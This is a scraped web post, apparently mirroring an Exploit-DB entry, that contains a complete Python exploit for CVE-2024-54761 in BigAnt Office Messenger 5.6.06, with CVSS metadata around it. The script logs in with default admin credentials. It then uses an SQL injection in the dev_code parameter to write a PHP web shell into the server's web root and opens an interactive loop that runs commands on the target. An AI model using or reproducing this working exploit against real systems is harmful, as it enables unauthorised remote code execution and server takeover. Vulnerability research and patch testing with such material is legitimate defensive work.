{“lastseen”:”2025-08-18T12:05:34″,”description”:”Exploit Title:…”,”published”:”2025-08-18T00:00:00″,”modified”:”2025-08-18T00:00:00″,”type”:”exploitdb”,”title”:”BigAnt Office Messenger 5.6.06 – SQL Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52412″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-54761″],”sourceData”:”# Exploit Title: BigAnt Office Messenger 5.6.06 – SQL Injection\\r\\n# Date: 01.09.2025 \\r\\n# Exploit Author: Nicat Abbasov \\r\\n# Vendor Homepage: https:\/\/www.bigantsoft.com\/ \\r\\n# Software Link: https:\/\/www.bigantsoft.com\/download.html \\r\\n# Version: 5.6.06 \\r\\n# Tested on: 5.6.06 \\r\\n# CVE : CVE-2024-54761\\r\\n# Github repo: https:\/\/github.com\/nscan9\/CVE-2024-54761\\r\\n\\r\\nimport requests\\r\\nfrom bs4 import BeautifulSoup\\r\\nimport base64\\r\\n\\r\\nclass Exploit:\\r\\n def __init__(self, rhost, rport=8000, username=’admin’, password=’123456′):\\r\\n self.rhost = rhost\\r\\n self.rport = rport\\r\\n self.username = username.lower()\\r\\n self.password = password\\r\\n self.target = f’http:\/\/{self.rhost}:{self.rport}’\\r\\n self.session = requests.Session()\\r\\n self.headers = {\\r\\n ‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64; rv:128.0) Gecko\/20100101 Firefox\/128.0’,\\r\\n ‘X-Requested-With’: ‘XMLHttpRequest’,\\r\\n ‘Origin’: self.target,\\r\\n ‘Referer’: f'{self.target}\/index.php\/Home\/login\/index.html’,\\r\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded; charset=UTF-8’,\\r\\n }\\r\\n self.clientid_map = {\\r\\n ‘admin’: ‘1’,\\r\\n ‘security’: ‘2’,\\r\\n ‘auditor’: ‘3’,\\r\\n ‘superadmin’: ‘4’,\\r\\n }\\r\\n self.clientid = self.clientid_map.get(self.username, ‘4’) # Default to 4 if unknown\\r\\n\\r\\n def get_tokens(self):\\r\\n print(\\”[*] Fetching login page tokens…\\”)\\r\\n url = f'{self.target}\/index.php\/Home\/login\/index.html’\\r\\n r = self.session.get(url, headers={‘User-Agent’: self.headers[‘User-Agent’]})\\r\\n soup = BeautifulSoup(r.text, ‘html.parser’)\\r\\n\\r\\n tokens = {}\\r\\n meta = soup.find(‘meta’, attrs={‘name’: ‘__hash__’})\\r\\n if meta:\\r\\n tokens[‘__hash__’] = meta[‘content’]\\r\\n\\r\\n form = soup.find(‘form’)\\r\\n if form:\\r\\n for hidden in form.find_all(‘input’, type=’hidden’):\\r\\n name = hidden.get(‘name’)\\r\\n value = hidden.get(‘value’, ”)\\r\\n if name and name not in tokens:\\r\\n tokens[name] = value\\r\\n\\r\\n return tokens\\r\\n\\r\\n def login(self):\\r\\n tokens = self.get_tokens()\\r\\n if ‘__hash__’ in tokens:\\r\\n tokens[‘__hash__’] = tokens[‘__hash__’]\\r\\n\\r\\n encoded_password = base64.b64encode(self.password.encode()).decode()\\r\\n\\r\\n data = {\\r\\n ‘saas’: ‘default’,\\r\\n ‘account’: self.username,\\r\\n ‘password’: encoded_password,\\r\\n ‘to’: ‘admin’,\\r\\n ‘app’: ”,\\r\\n ‘submit’: ”,\\r\\n }\\r\\n data.update(tokens)\\r\\n\\r\\n login_url = f'{self.target}\/index.php\/Home\/Login\/login_post’\\r\\n print(f\\”[*] Logging in as {self.username}…\\”)\\r\\n resp = self.session.post(login_url, headers=self.headers, data=data)\\r\\n if resp.status_code != 200:\\r\\n print(f\\”[-] Login failed with HTTP {resp.status_code}\\”)\\r\\n return False\\r\\n\\r\\n try:\\r\\n json_resp = resp.json()\\r\\n if json_resp.get(‘status’) == 1:\\r\\n print(\\”[+] Login successful!\\”)\\r\\n return True\\r\\n else:\\r\\n print(f\\”[-] Login failed: {json_resp.get(‘info’)}\\”)\\r\\n return False\\r\\n except:\\r\\n print(\\”[-] Failed to parse login response JSON\\”)\\r\\n return False\\r\\n\\r\\n def check_redirect(self):\\r\\n url = f'{self.target}\/index.php\/admin\/public\/load\/clientid\/{self.clientid}.html’\\r\\n print(f\\”[*] Checking for redirect after login to clientid {self.clientid} …\\”)\\r\\n r = self.session.get(url, headers={‘User-Agent’: self.headers[‘User-Agent’]}, allow_redirects=False)\\r\\n if r.status_code == 302:\\r\\n print(f\\”[+] Redirect found to {r.headers.get(‘Location’)}\\”)\\r\\n return True\\r\\n else:\\r\\n print(f\\”[-] Redirect not found, got HTTP {r.status_code}\\”)\\r\\n return False\\r\\n\\r\\n def upload_shell(self):\\r\\n print(\\”[*] Uploading webshell via SQLi…\\”)\\r\\n payload = ‘;SELECT \\”\\u003c?php system($_GET[\\\\’cmd\\\\’]); ?\\u003e\\” INTO OUTFILE \\\\’C:\/Program Files (x86)\/BigAntSoft\/IM Console\/im_webserver\/htdocs\/shell.php\\\\’– -‘\\r\\n url = f'{self.target}\/index.php\/Admin\/user\/index\/clientid\/{self.clientid}.html’\\r\\n params = {‘dev_code’: payload}\\r\\n r = self.session.get(url, params=params, headers={‘User-Agent’: self.headers[‘User-Agent’]})\\r\\n if r.status_code == 200:\\r\\n print(\\”[+] Payload sent, checking the shell…\\”)\\r\\n self.check_shell()\\r\\n else:\\r\\n print(f\\”[-] Failed to send payload, HTTP {r.status_code}\\”)\\r\\n\\r\\n def check_shell(self):\\r\\n print(\\”[*] Enter shell commands to execute on the target. Empty command to exit.\\”)\\r\\n while True:\\r\\n cmd = input(\\”shell\\u003e \\”).strip()\\r\\n if not cmd:\\r\\n print(\\”[*] Exiting shell.\\”)\\r\\n break\\r\\n shell_url = f'{self.target}\/shell.php?cmd={cmd}’\\r\\n print(f\\”[*] Sending command: {cmd}\\”)\\r\\n r = self.session.get(shell_url)\\r\\n if r.status_code == 200 and r.text.strip():\\r\\n print(r.text.strip())\\r\\n else:\\r\\n print(\\”[-] No response or empty output from shell.\\”)\\r\\n\\r\\n def run(self):\\r\\n if self.login():\\r\\n if self.check_redirect():\\r\\n self.upload_shell()\\r\\n else:\\r\\n print(\\”[-] Redirect check failed, aborting.\\”)\\r\\n else:\\r\\n print(\\”[-] Login failed, aborting.\\”)\\r\\n\\r\\n\\r\\nif __name__ == ‘__main__’:\\r\\n import argparse\\r\\n\\r\\n parser = argparse.ArgumentParser(description=’Exploit for CVE-2024-54761 BigAntSoft SQLi to RCE’)\\r\\n parser.add_argument(‘-r’, ‘–rhost’, required=True, help=’Target IP address’)\\r\\n parser.add_argument(‘-p’, ‘–rport’, default=8000, type=int, help=’Target port (default 8000)’)\\r\\n parser.add_argument(‘-u’, ‘–username’, default=’admin’, help=’Login username (default admin)’)\\r\\n parser.add_argument(‘-P’, ‘–password’, default=’123456′, help=’Login password in plain text’)\\r\\n\\r\\n args = parser.parse_args()\\r\\n\\r\\n exploit = Exploit(args.rhost, args.rport, args.username, args.password)\\r\\n exploit.run()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52412″,”cvss”:{“score”:6.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52412″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-18T12:05:34″,”description”:”Exploit Title:…”,”published”:”2025-08-18T00:00:00″,”modified”:”2025-08-18T00:00:00″,”type”:”exploitdb”,”title”:”BigAnt Office Messenger 5.6.06 – SQL Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52412″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-54761″],”sourceData”:”# Exploit Title: BigAnt Office Messenger 5.6.06 – SQL Injection\\r\\n# Date: 01.09.2025 \\r\\n# Exploit Author: Nicat Abbasov \\r\\n#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,23,12,40,21,13,7,11,5],"class_list":["post-13288","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-63","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n